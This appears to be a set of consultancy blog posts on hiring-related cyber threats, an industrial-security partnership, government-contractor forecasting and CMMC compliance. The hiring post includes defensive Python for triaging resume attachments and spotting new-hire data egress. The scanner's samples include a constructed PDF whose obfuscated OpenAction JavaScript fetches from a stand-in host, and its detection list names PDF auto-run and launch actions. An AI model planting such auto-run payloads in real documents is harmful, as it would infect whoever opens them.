Posted on Nov 1, 2024
The process of hiring employees has evolved since the days of posting ads in the newspaper. While technological advancements have streamlined recruitment, they have also opened new avenues for cyber threats. Cybercriminals are exploiting hiring processes to infiltrate organizations, steal sensitive data and cause financial and reputation damage. Recent incidents involving North Korean operatives and sophisticated hacking groups highlight the urgency of addressing these risks.
Hiring is often in the hands of trained human resource recruiters. Just as often, though, it is shouldered by people who wear many hats: office managers, team or department leads and business owners who have never been trained to look out for bad actors. Below, I explore the cyber risks associated with hiring, detail specific tactics used by cybercriminals and offer practical tips for safeguarding against these growing threats.
Case Study: North Korean Operatives Posing as IT Workers
A recent incident uncovered that North Korean IT workers had been securing remote positions with U.S. companies under false or stolen identities. These individuals presented impressive resumes and portfolios to appear legitimate. Once hired, their salaries were routed back to the North Korean government, and the access they were granted to company systems and data created a further risk of data theft or extortion.
Tactics Used Against Companies: Impersonation and Fake Profiles
Cybercriminals are creating elaborate fake identities to deceive HR professionals during the hiring process. These fabricated personas often come with detailed resumes, professional social media profiles and endorsements from seemingly reputable sources. The goal is to gain the company’s trust and secure a position that provides access to sensitive information.
Example: An individual might pose as a seasoned software engineer with an impressive work history at well-known tech companies. They provide falsified references that are part of the scam. HR professionals, eager to fill critical positions, may overlook subtle inconsistencies, allowing the impostor to infiltrate the organization.
Malicious Attachments in Applications
Another prevalent tactic involves sending resumes and cover letters that carry malware. Cybercriminals craft documents that appear legitimate but contain hidden malicious code, typically a macro, an embedded script or action that fires when the document is opened, or an exploit for an unpatched viewer. When HR personnel open these files (often after clicking through an "enable content" prompt), the payload runs on the recruiter's workstation and can spread from there into the company's network.
Example: A resume delivered as a PDF or a macro-enabled Word document fetches a ransomware payload when opened. The malware encrypts critical files, rendering systems inoperable until a ransom is paid. Such incidents can lead to significant downtime, financial losses and reputational damage.
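Static triage of an incoming resume before it reaches a recruiter, as an added example that is not part of the original post: a Python script of my own that sniffs the real file type from its magic bytes, normalises PDF name escapes so an obfuscated /J#61vaScript still matches, flags the PDF actions and Office parts that carry active content, and returns an allow/review/block verdict. The weights, thresholds and file names are illustrative assumptions, and the four samples are constructed stand-ins, not real malware.

```python
import io
import re
import zipfile

# PDF name objects that make a document act on its own (/OpenAction, /AA) or
# that carry the usual payload vehicles, with an illustrative weight each.
PDF_RISKY_NAMES = {
    "/OpenAction": 2, "/AA": 2, "/JavaScript": 3, "/JS": 3,
    "/Launch": 3, "/EmbeddedFile": 2, "/RichMedia": 2, "/XFA": 1,
}
# Parts of a zip-based Office document that hold macros or embedded objects.
OFFICE_RISKY_PARTS = ("vbaProject.bin", "oleObject", "activeX")
# What a file with this extension must start with (magic bytes).
MAGIC_FOR_EXT = {"pdf": b"%PDF", "docx": b"PK\x03\x04", "docm": b"PK\x03\x04"}

_NAME_ESCAPE = re.compile(rb"#([0-9A-Fa-f]{2})")

def _unescape_pdf_names(data: bytes) -> bytes:
    # PDF lets /JavaScript be written as /J#61vaScript; decode #xx escapes
    # so an obfuscated name still hits the list above.
    return _NAME_ESCAPE.sub(lambda m: bytes([int(m.group(1), 16)]), data)

def sniff_type(data: bytes) -> str:
    if data.startswith(b"%PDF"):
        return "pdf"
    if data.startswith(b"PK\x03\x04"):
        return "zip"          # OOXML (docx/xlsx/pptx) is a zip container
    if data.startswith(b"MZ"):
        return "exe"
    return "unknown"

def triage_attachment(filename: str, data: bytes) -> dict:
    ext = filename.rsplit(".", 1)[-1].lower()
    kind = sniff_type(data)
    findings, score = [], 0

    # 1. Content that does not match the claimed extension (resume.pdf that
    #    is really a Windows executable) is blocked outright.
    expected = MAGIC_FOR_EXT.get(ext)
    if expected and not data.startswith(expected):
        findings.append(f".{ext} extension but content is {kind}")
        score += 3
    if kind == "exe":
        findings.append("PE executable")
        score += 5

    # 2. PDF: count risky names on the escape-normalised bytes. The lookahead
    #    keeps /JS from matching the start of a longer, unrelated name.
    if kind == "pdf":
        text = _unescape_pdf_names(data)
        for name, weight in PDF_RISKY_NAMES.items():
            hits = len(re.findall(re.escape(name.encode()) + rb"(?![A-Za-z0-9_])", text))
            if hits:
                findings.append(f"{name} x{hits}")
                score += weight * hits
        if b"/ObjStm" in text:
            # Dictionaries inside compressed object streams are invisible to a
            # byte scan; lower confidence so any other indicator forces review.
            findings.append("object streams present, static scan incomplete")
            score += 1

    # 3. Office: look for macro and embedded-object parts in the container.
    if kind == "zip":
        try:
            with zipfile.ZipFile(io.BytesIO(data)) as zf:
                parts = zf.namelist()
        except zipfile.BadZipFile:
            parts = []
            findings.append("malformed zip container")
            score += 2
        for part in parts:
            if any(marker in part for marker in OFFICE_RISKY_PARTS):
                findings.append(f"active content part: {part}")
                score += 4

    verdict = "block" if score >= 5 else "review" if score >= 2 else "allow"
    return {"type": kind, "score": score, "findings": findings, "verdict": verdict}

# Constructed samples (not real malware): a plain resume PDF with a web link,
# a PDF whose OpenAction runs JavaScript (one name hex-obfuscated), and a
# Windows executable renamed to look like a PDF.
CLEAN_PDF = (b"%PDF-1.4\n1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj\n"
             b"2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj\n"
             b"3 0 obj << /Type /Page /Parent 2 0 R /Annots [4 0 R] >> endobj\n"
             b"4 0 obj << /Type /Annot /Subtype /Link /A << /S /URI /URI (https://example.com/cv) >> >> endobj\n"
             b"trailer << /Root 1 0 R >>\n%%EOF\n")
JS_PDF = (b"%PDF-1.4\n1 0 obj << /Type /Catalog /Pages 2 0 R "
          b"/OpenAction << /S /J#61vaScript /JS (app.launchURL('http://example.invalid/dl', true)) >> >> endobj\n"
          b"2 0 obj << /Type /Pages /Kids [] /Count 0 >> endobj\ntrailer << /Root 1 0 R >>\n%%EOF\n")
FAKE_PDF = b"MZ\x90\x00" + b"\x00" * 56 + b"This program cannot be run in DOS mode."

def build_docm(with_macro: bool) -> bytes:
    # Minimal OOXML container; the macro variant adds a stub vbaProject.bin.
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<w:document/>")
        if with_macro:
            zf.writestr("word/vbaProject.bin", b"\xd0\xcf\x11\xe0stub")
    return buf.getvalue()

if __name__ == "__main__":
    for name, blob in [("resume.pdf", CLEAN_PDF), ("resume.pdf", JS_PDF),
                       ("resume.docm", build_docm(True)), ("resume.pdf", FAKE_PDF)]:
        r = triage_attachment(name, blob)
        print(f"{name}: {r['verdict']} (score {r['score']}) {r['findings']}")
```

A byte-level scan like this is a cheap first gate, not a replacement for the sandbox detonation recommended later on this page: anything that lands in "review" (macro-enabled documents, PDFs with object streams plus a weak indicator) is exactly what should be detonated before a recruiter sees it.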
Compromised Third-Party Recruitment Platforms
Attackers also infiltrate job boards and recruitment platforms to post fake job listings or harvest information from genuine applications. By compromising these third-party services, cybercriminals can cast a wide net, affecting multiple companies and a vast pool of candidates.
Example: An attacker gains access to a popular job board and posts listings for high-demand positions at reputable companies. Unsuspecting HR professionals and job seekers interact with these listings, inadvertently providing valuable information or downloading malicious content. This can lead to unauthorized access to company systems or identity theft for individuals.
Tactics Used Against Job Seekers
Fake Job Offers from Cybercriminals
Scammers are increasingly posing as HR professionals from legitimate companies, reaching out to candidates with enticing job offers. Their objective is to extract personal information, financial details or even direct payments under the guise of processing fees or equipment purchases.
Example: An applicant receives an offer letter that appears official, complete with company logos and professional language. The letter requests a processing fee or sensitive banking information for direct deposit setup. Eager to secure the position, the candidate complies, only to later realize they have been scammed. This tactic not only leads to financial loss but can also result in identity theft.
Phishing Emails Mimicking Recruitment Communications
Phishing remains a common and effective tactic used by cybercriminals. In this context, attackers send emails that appear to be from well-known companies, prompting candidates to click on links or download attachments. These actions lead to credential theft or malware installation on the victim’s device.
Example: A job seeker receives an email requesting them to log into a portal to schedule an interview. The email looks legitimate, featuring company branding and professional language. However, the link directs them to a fake website designed to capture their login credentials or personal information. Such phishing attempts can compromise not only the individual’s data but also any connected accounts, leading to broader security breaches.
Practical Tips for HR Professionals
Implement Rigorous Verification Processes
Thorough Background Checks: Go beyond standard reference checks. Verify educational qualifications, certifications and previous employment using trusted third-party services. Contact previous employers using official contact information found independently, rather than relying solely on details provided by the candidate.
Digital Footprint Analysis: Examine candidates’ online presence across professional networking sites to identify inconsistencies or red flags. Cross-reference resume details with LinkedIn profiles and look for endorsements or connections that validate the candidate’s history.
Secure Recruitment Platforms
Use Official Communication Channels: Ensure all recruitment communications are conducted through company email domains and secure applicant tracking systems. Educate HR staff to avoid using personal emails for professional correspondence and to be wary of unsolicited applications from unknown sources.
Regular Security Audits: Work with IT departments to assess the security of recruitment software and platforms regularly. Implement multi-factor authentication and encryption where possible to protect sensitive data.
Educate HR Staff on Cybersecurity
Training Programs: Conduct regular cybersecurity training focused on the latest threats targeting HR functions. Include modules on recognizing phishing emails, suspicious attachments and social engineering tactics.
Promote a Culture of Vigilance: Encourage staff to report any suspicious activities without fear of reprimand. Establish clear protocols for reporting and responding to potential security incidents.
Collaborate with IT and Cybersecurity Teams
Integrated Security Measures: Develop joint strategies with IT to secure the recruitment process end-to-end. Schedule regular meetings between HR and IT to discuss emerging threats and update security practices accordingly.
Access Controls for New Hires: Implement a phased approach to granting system access to new employees, starting with minimal privileges. Use role-based access control to ensure employees have access only to the resources necessary for their job functions.
Utilize Advanced Security Tools
Malware Detection Software: Invest in advanced antivirus and anti-malware solutions that scan all incoming emails and attachments. Enable automatic scanning of documents in a sandbox environment before they reach HR personnel.
Behavioral Analytics: Deploy systems that monitor user behavior for anomalies, particularly among new hires. Set up alerts for unusual activities, such as large data transfers or access attempts outside of normal working hours.
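The two alerts described above (large data transfers and off-hours access, with extra weight on new hires), run over constructed audit-log lines, as an added example that is not part of the original post: Python of my own that parses a simple `user=… action=… bytes=…` log format, treats anyone hired within the last 30 days as a new hire, raises an off-hours alert when a new hire is active on a weekend or outside 07:00-19:00, and raises an egress alert when a user's daily bytes out exceed both an absolute floor and five times the tenured staff's daily median. The log format, hire roster, working hours and thresholds are assumptions for the example, not anything from the original page.

```python
import re
from collections import defaultdict
from dataclasses import dataclass
from datetime import date, datetime, timedelta
from statistics import median

@dataclass(frozen=True)
class Event:
    ts: datetime
    user: str
    action: str
    bytes_out: int

NEW_HIRE_WINDOW = timedelta(days=30)   # assumed: "new hire" = hired in the last 30 days
WORK_START, WORK_END = 7, 19           # assumed: 07:00-19:00 Mon-Fri is "normal hours"
EGRESS_FLOOR = 200 * 1024 * 1024       # never alert on less than 200 MiB/day
EGRESS_RATIO = 5.0                     # ...or on less than 5x the tenured daily median

# Assumed log format: "<ISO timestamp> user=<id> action=<verb> bytes=<n>"
_LINE = re.compile(r"^(\S+) user=(\S+) action=(\S+) bytes=(\d+)")

def parse_line(line: str) -> Event:
    m = _LINE.match(line)
    if not m:
        raise ValueError(f"unparseable log line: {line!r}")
    ts, user, action, nbytes = m.groups()
    return Event(datetime.fromisoformat(ts), user, action, int(nbytes))

def is_new_hire(user: str, day: date, hire_dates: dict) -> bool:
    hired = hire_dates.get(user)
    return hired is not None and timedelta(0) <= day - hired <= NEW_HIRE_WINDOW

def is_off_hours(ts: datetime) -> bool:
    return ts.weekday() >= 5 or not (WORK_START <= ts.hour < WORK_END)

def detect(events, hire_dates: dict) -> list:
    """Return alerts; each is a dict with rule, user, day and severity."""
    alerts = []
    off_hours = defaultdict(int)   # (user, day) -> off-hours event count
    egress = defaultdict(int)      # (user, day) -> bytes out

    for e in events:
        key = (e.user, e.ts.date())
        egress[key] += e.bytes_out
        # Rule 1: off-hours activity, only for accounts still in the new-hire window.
        if is_off_hours(e.ts) and is_new_hire(e.user, e.ts.date(), hire_dates):
            off_hours[key] += 1
    for (user, day), n in sorted(off_hours.items()):
        alerts.append({"rule": "new_hire_off_hours", "user": user, "day": day,
                       "count": n, "severity": "high"})

    # Rule 2: daily egress compared with a baseline from tenured users only.
    # The median is robust, so one tenured outlier does not hide everyone else.
    tenured_daily = [b for (u, d), b in egress.items()
                     if b > 0 and not is_new_hire(u, d, hire_dates)]
    baseline = median(tenured_daily) if tenured_daily else 0
    threshold = max(EGRESS_FLOOR, EGRESS_RATIO * baseline)
    for (user, day), b in sorted(egress.items()):
        if b > threshold:
            new = is_new_hire(user, day, hire_dates)
            alerts.append({"rule": "large_egress", "user": user, "day": day,
                           "bytes": b, "threshold": int(threshold),
                           "severity": "high" if new else "medium"})
    return alerts

# Constructed roster and log. nkim and pmartin are new hires; nkim logs in at
# 02:14 on a Monday and on a Saturday and pulls 700 MiB; carol is tenured but
# pulls 900 MiB at 22:05 (flagged for volume, not for hours).
HIRE_DATES = {"alice": date(2021, 3, 1), "bob": date(2019, 6, 17),
              "carol": date(2022, 1, 10), "nkim": date(2024, 10, 14),
              "pmartin": date(2024, 10, 7)}
SAMPLE_LOG = """
2024-10-26T14:02:11 user=nkim action=login bytes=0
2024-10-28T02:14:09 user=nkim action=login bytes=0
2024-10-28T02:20:41 user=nkim action=download bytes=734003200
2024-10-28T09:15:00 user=alice action=download bytes=52428800
2024-10-28T10:02:30 user=bob action=download bytes=83886080
2024-10-28T11:30:00 user=pmartin action=download bytes=62914560
2024-10-28T22:05:17 user=carol action=download bytes=943718400
"""
SAMPLE_EVENTS = [parse_line(l) for l in SAMPLE_LOG.splitlines() if l.strip()]

if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS, HIRE_DATES):
        print(a)
```

Run as-is it prints four alerts: two off-hours alerts for nkim (Saturday, then two events before dawn on Monday), a high-severity egress alert for nkim, and a medium one for carol; pmartin, a new hire behaving normally, produces nothing. In production the baseline would be computed over weeks of history and per role, not over a single day.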
Protecting Job Seekers from Cyber Threats
Advice for HR Professionals
Transparent Communication: Clearly outline the hiring process on the company’s official website, including the email domains used for correspondence. Provide candidates with contact information to verify the legitimacy of job offers and recruitment communications.
Public Awareness Campaigns: Use social media and professional networks to inform potential applicants about known scams and how to avoid them. Publish articles or posts warning about common fraud tactics and offering guidance.
Advice for Job Seekers
Verify Job Postings and Communications: Cross-check job listings on the company’s official website and be cautious of unsolicited offers. If in doubt, contact the company’s HR department directly using information from the official website.
Protect Personal Information: Avoid sharing sensitive data such as Social Security numbers or bank details until it is legally required and through secure channels. Be skeptical of requests for upfront payments or personal information early in the recruitment process.
Stay Alert to Red Flags: Be wary of poor grammar, generic salutations and inconsistencies in communications purportedly from reputable companies. Trust your instincts; if something feels off, investigate further before proceeding.
The Dual Responsibility: A Collaborative Effort
For Companies
Organizations must acknowledge that cybersecurity is a shared responsibility. By fostering collaboration between HR and IT, companies can develop robust defenses against recruitment-related cyber threats. Integrating cybersecurity considerations into HR policies and procedures is essential. This means embedding security checkpoints throughout the hiring process, from application to onboarding. Providing HR teams with tools and training empowers them to detect and prevent cyber-attacks effectively. Investing in security software and regular training sessions ensures that HR professionals are equipped to recognize and respond to threats.
For HR Professionals
As gatekeepers of talent, HR professionals play a crucial role in safeguarding the organization. Staying informed and vigilant is paramount to reducing the risk of security breaches. Continuous education on the latest cyber threats and best practices in recruitment security enables HR teams to stay ahead of attackers. Encouraging open communication within the team about threats and suspicious activities fosters a proactive security culture.
For Job Seekers
Job seekers must also take responsibility for their cybersecurity. Awareness and caution are vital in preventing scams that could have long-term consequences. Educating themselves about common job search scams and learning how to identify red flags can significantly reduce their risk. Conducting due diligence by researching companies and verifying opportunities before engaging deeply in the application process ensures that they are interacting with legitimate employers.
Act Now
The evolving tactics of cybercriminals underscore the urgent need for enhanced security in the hiring process. Both companies and job seekers are targets, and the consequences of complacency can be severe.
For organizations, integrating cybersecurity into HR practices is both a defensive and a strategic imperative. HR professionals must be equipped with the knowledge and tools to identify and counteract threats. Similarly, job seekers should approach opportunities with a healthy degree of skepticism.
By fostering a collaborative approach and prioritizing education and vigilance, we can strengthen the defenses of our organizations and protect individuals from cyber threats. The responsibility is shared, and the time to act is now.
Posted on Jul 17, 2024
The security of our nation’s critical infrastructure has never been more imperative. As partners to our clients in the Defense Industrial Base (DIB) and critical infrastructure, we understand the critical role we play in national security. Our commitment extends beyond compliance; we are dedicated to proactive collaboration and advanced cybersecurity measures. In line with this commitment, we are proud to announce our partnership with Dragos, Inc., a leader in industrial cybersecurity.
Partnership with Dragos, Inc.
Through our partnership with Dragos, Inc., we aim to leverage their expertise in industrial control systems (ICS) and operational technology (OT) cybersecurity. Dragos brings unparalleled capabilities in threat detection, incident response, and vulnerability management tailored for critical infrastructure. This collaboration enhances our ability to provide our clients with the most advanced security solutions, ensuring that their operations remain secure and resilient against emerging threats.
The Dragos Platform received the 2023 SC Award for Best Industrial Security Solution for its ability to help organizations identify their OT assets, manage vulnerabilities, and detect and respond to threats that target industrial control systems. In June, Dragos was named Best Incident Response Solution by SC Awards Europe.
Through this partnership, MNS Group gains the benefits of the Dragos Global Partner Program, the only channel program to comprise OT cybersecurity technology, services, and threat intelligence supported by training that prepares partners as OT cybersecurity experts. The program helps develop and advance resellers as ICS/OT cybersecurity experts and advisors with the full spectrum of OT cybersecurity offerings in their portfolios.
MITRE’s Call to Action
Recent insights from MITRE highlight the escalating threats posed by cyberattacks, particularly from nation-state actors such as the Chinese Communist Party (CCP), targeting essential services like energy, transportation, communications, and water systems. This environment necessitates robust measures and innovative solutions to ensure resilience and operational continuity.
MITRE has been vocal about the need for the U.S. government to intensify efforts to safeguard critical infrastructure. A recent MITRE-Harris poll underscores the public’s concern, with 81% of respondents expressing worry over the security of vital services, and 78% believing that the federal government bears full or partial responsibility for fortifying these infrastructures. MITRE’s leadership emphasizes that the threat landscape has evolved significantly, requiring a shift from incremental improvements to comprehensive, coordinated responses involving both public and private sectors.
Proactive Measures and Client Support
We are dedicated to supporting our clients by:
Implementing Advanced Security Protocols: Utilizing the latest technologies and best practices in cybersecurity to protect against sophisticated attacks.
Continuous Monitoring and Threat Intelligence: Providing real-time monitoring and actionable intelligence to preemptively address potential threats.
Training and Awareness Programs: Educating our clients on the latest cyber threats and best practices to maintain robust security postures.
Incident Response and Recovery: Ensuring swift and effective response to any cyber incidents, minimizing downtime and operational impact.
Looking Ahead
As threats to critical infrastructure continue to evolve, so must our strategies and partnerships. We remain committed to collaborating with industry leaders like Dragos, Inc., and aligning with MITRE’s recommendations to enhance our collective resilience. By fostering a culture of security and innovation, we aim to protect the vital services that underpin our nation’s security and prosperity.
For more insights into how we are working to secure critical infrastructure and our strategic partnerships, stay tuned to our updates and reach out to our team for more information.
Posted on Apr 30, 2024
Small and medium businesses (SMBs), defined as those with under $25 million in annual revenue, are the economic backbone on which our nation depends. Every state in the union and members of every community have a vested interest in and depend on the success of small and medium businesses. To plan for success, businesses utilize forecasting. Forecasting employs past data to make educated predictions about future trends. Companies use this method to decide on budget allocation or prepare for expected costs in upcoming periods, usually influenced by the anticipated demand for their products and services.
How important is forecasting by SMBs to our nation's overall economic health and security? Very. This is emphasized further when the focus is narrowed to GovCon SMBs. Their success, or failure, is shared and felt among our nation's citizens.
“Above all, the forecaster’s task is to map uncertainty, for in a world where our actions in the present influence the future, uncertainty is opportunity.” Paul Saffo
Events over the last several years have allowed ample opportunity for business managers and executives to navigate uncertainty. Indeed, even the concept of certainty seems quaint among GovCons when the US has lost 30% of its defense industrial base (DIB) over the last 10 years, as shared by Isabella Guzman, administrator for the U.S. Small Business Administration (SBA). Forecasting for non-GovCons may include Sales Revenue, Cost of Goods Sold (COGS), Gross Margin, Operating Expenses, Interest and Tax Expenses, Capital Expenditures, Inventory Levels, Accounts Receivable and Payable, Cash Flow, Market Trends and Economic Conditions, Workforce Needs, New Projects and Investments, Break-even and Risk Analysis.
There are abundant challenges for GovCons to consider when forecasting in addition to the lengthy list above that are unique to them due to specific operational, regulatory, and financial environments:
Regulatory Compliance and Changes: GovCons must anticipate and plan for changes in government regulations, which can affect everything from contract bidding to execution.
Budget Cycles and Funding Fluctuations: Government budgets are subject to political processes and fiscal cycles, leading to fluctuations in funding availability. They must have an understanding of the government’s budgeting process, the timing of appropriations and the (frustrating) potential for shutdowns.
Contract Types and Payment Schedules: GovCons deal with a variety of contract types (e.g., fixed-price, cost-reimbursement, time-and-materials) each with its own financial and performance risks. Forecasting must account for the specifics of these contracts, including payment schedules, performance milestones, and risk of adjustments.
Bid and Proposal Efforts: Forecasting in GovCons must include the costs and timelines associated with preparing bids and proposals, as well as the probability of winning contracts.
Long-term Contracts and Lifecycle Management: Many government contracts are for long-term projects that can span several years. Forecasting needs to account for the lifecycle management of these contracts, including potential modifications, maintenance, and operational support.
Security Clearances and Classified Work: Projects requiring security clearances or involving classified information add layers of complexity to forecasting. This includes considerations for personnel clearances, secure facilities, and IT infrastructure.
Public-Private Partnerships and Joint Ventures: GovCons often engage in public-private partnerships or form joint ventures to pursue contracts. Forecasting must consider the dynamics and obligations of these partnerships, including shared risks and revenues.
Market and Political Environment: The demand for government contracting services can be influenced by political priorities, geopolitical events, and changes in policy. Forecasting in this sector requires a deep understanding of these external factors and their potential impact on contract opportunities.
Technology Adoption and Innovation Cycles: Government contracts may involve cutting-edge technology or require adherence to specific technical standards. Forecasting must factor in the costs and timelines for research and development, technology adoption, and potential innovation cycles.
Don’t Miss the Shifts
Are there additional critical areas that GovCons should track into the future for their businesses to succeed in a climate of such uncertainty, for the sake of national security? Yes. As a business that provides compliance, information technology, and business consulting, we have insight into some areas that should be tracked now by GovCons and that are often missed.
Survey Says: GovCons are Up at Night
In truth, executives are kept up at night by several issues regarding their companies that are unique to GovCon businesses. The GAUGE 2023 Report, by Unanet and CohnReznick, gathers information from 1,180 survey responses from a variety of government contracting professionals. 60% of respondents were in a C-Suite or Controller role, and more than half of the respondents were small and mid-sized businesses.
Posted on Apr 30, 2024
If your business is not a member of the Defense Industrial Base (DIB), and you don’t do work on a contract basis as part of the supply chain to the Department of Defense, you can stop reading now. Seriously. Despite the article’s title, this missive is full of acronyms and explanations of compliance requirements and has nothing to do with breakfast. And did I mention acronyms? I will wait.
Okay, since it is just “us” now, I will share a few high-importance details from the proposed CMMC rule, and specifically how you will work with companies like mine. Managed Services Providers (MSPs), Managed Security Service Providers (MSSPs), and other external service providers (ESPs) have been included in the CMMC fray, and it will impact your business.
Answered questions, with a side of questions
Over the last several years, we have had a lot of questions concerning our clients’ obligations because of the coming Cybersecurity Maturity Model Certification (CMMC). At long last, many of those questions are getting answered; the DoD released the proposed rule on December 26, 2023.
CMMC is the verification mechanism through which the DoD is assured that the contractors and subcontractors it works with have the information security controls in place to protect the sensitive data they hold. It was created because the DoD found that cybersecurity practices across much of the DIB were weak, leaving our nation vulnerable to attack, and that self-attestation alone was not fixing the problem. The CMMC rule closes the loophole that allowed plans of action and milestones (POA&Ms), which are meant to be short-term remediation plans, to remain open for long periods of time.
Most of our questions have been regarding the more advanced cybersecurity and operational requirements for DIB businesses that process, store, or transmit Controlled Unclassified Information (CUI). Most of these will need a CMMC Level 2 assessment performed by an authorized CMMC Third Party Assessment Organization (C3PAO); the proposed rule also allows a Level 2 self-assessment for some contracts, at the DoD's discretion. Level 1 DIB businesses are required to protect Federal Contract Information (FCI) and are allowed to self-assess their environment. Both Levels 1 and 2 require that a senior company official sign an affirmation that the assessment is accurate and that the controls are in place and being followed.
The significant update is that businesses classified as Level 1 and Level 2 in the Defense Industrial Base (DIB) sector will face upcoming challenges related to choosing their service providers.
It turns out, the DoD references many of the functions that MSPs perform within the definition of an External Service Provider: “external people, technology… that an organization utilizes for provision and management of comprehensive IT and/or cybersecurity services… CUI or Security Protection Data (e.g., log data, configuration data) must be processed, stored, or transmitted on the ESP assets to be considered an ESP.”
Accordingly, we, the MSPs and MSSPs of the world that serve the DIB, will need to achieve our CMMC certification too! Not only that, but any ESP will need to certify at or above the level at which the contractor it supports is required to certify. While we have been expecting this and implementing the requirements in our own business, most MSPs and other ESPs have not.
Why does this matter to you? When your company uses an MSP or another external service provider that processes, stores, or transmits your CUI or security protection data, that provider is "in scope" for your organization's System Security Plan and will be included in your assessment. Meaning: you can't pass your CMMC assessment unless and until your ESP has passed its own assessment and holds a final certification. You will not be able to work for the DoD until all of your in-scope ESPs have their certification. Let's just say there is some debate about how this chicken-and-egg timing will work itself out, and there are still other considerations as far as timing.
This also means that your team will need to carefully vet the capabilities of every external service provider hired to work for you… and their tools.
Posted on Dec 22, 2023
At long last, the CMMC proposed rule will be released on December 26, 2023!
If you have not prepared to pass the CMMC Assessment, there is no time like the present! (And if we may be so bold, we suggest preparing for the journey with some music to get you in the right frame of mind!)
Where does a contractor in the Defense Industrial Base start?
Rally the troops, and choose a leader: CMMC compliance is a team effort. A common misconception of the CMMC program is that it consists entirely of technical controls and requires little coordination with staff not directly involved with IT. However, the CMMC program controls involve much more than technical configurations: human resources, building security, administration and operations, accounting, and even external service and cloud providers may be in scope.
Leadership starts at the top. Management must make clear that conforming to the requirements of CMMC is a priority. Kick off an all-hands meeting to align and educate the entire organization and include goals, defined roles and responsibilities, and communication channels. It is key to have one person designated to serve as the lead to coordinate your team's efforts. In one company that MNS Group works with, the head of business development led the compliance implementation for the company. Why that role to lead the effort? Lost opportunity. This individual had a lot to lose if the company did not become compliant in time to win the contracts that provided the bulk of his department's income, and he possessed the skills to educate, encourage, and track the various departments' contributions. Whoever in your organization secures the honor, they will require the support of the management team.
The good news is that if you are working with MNS Group, we are able to assist your team with our CMMC Certified Professionals and Assessors (CCPs and CCAs), with implementation and support toward compliance.
Determine the level you need to comply with.
Your contract and the type of information your company handles determines the level and number of controls your organization must meet. Every defense contractor will need to meet at minimum Level 1. The CMMC 2.0 model consists of three distinct levels, each representing a different set of cybersecurity practices and processes:
Level 1 – Foundational: This level is focused on the protection of Federal Contract Information (FCI) and encompasses the basic safeguarding requirements for this information as outlined in Federal Acquisition Regulation (FAR) 52.204-21. The CMMC 2.0 model describes these as 17 practices of basic cyber hygiene; the proposed rule counts them as the 15 requirements of FAR 52.204-21. At this level, companies perform an annual self-assessment.
Level 2 – Advanced: Level 2 covers the protection of Controlled Unclassified Information (CUI) and aligns with all 110 security requirements of NIST SP 800-171 Rev. 2; there is no subset at this level. Level 2 applies to you if your company handles CUI; you have been subject to DFARS 252.204-7012, which already requires NIST SP 800-171, since the end of 2017. Under the proposed rule, most Level 2 contracts require an independent C3PAO assessment every three years, with a smaller set of contracts permitting a self-assessment instead; both require an annual affirmation from a senior official.
Level 3 – Expert: This level is intended for DIB companies handling CUI associated with the DoD's most critical programs and highest-priority technologies, where the concern is Advanced Persistent Threats (APTs). Level 3 requires a final Level 2 C3PAO certification as a prerequisite and adds a subset of the enhanced security requirements from NIST SP 800-172 (24 of them in the proposed rule). Compliance with Level 3 requires a government-led assessment, conducted by the DoD's DIBCAC, every three years. The final rule is expected to have greater detail on this level.
Target your efforts based on the level at which your organization must comply.
Scoping
If your company handles, creates, stores, or transmits CUI: who handles it? Where is it accessed, processed, or stored? The environment where CUI exists determines your scope. A System Security Plan (SSP) documents what controls are in place and where. The smaller the environment, the less expensive compliance efforts will be. Some companies find that an enclave for the CUI is a smart solution.
An enclave is a way for organizations to limit the endpoints that need to be secured, making compliance efforts more streamlined, resulting in less expensive and sometimes faster compliance. All contractors to the DoD will have Level 1 controls in-scope applied organization-wide, even if your CUI is confined to an enclave.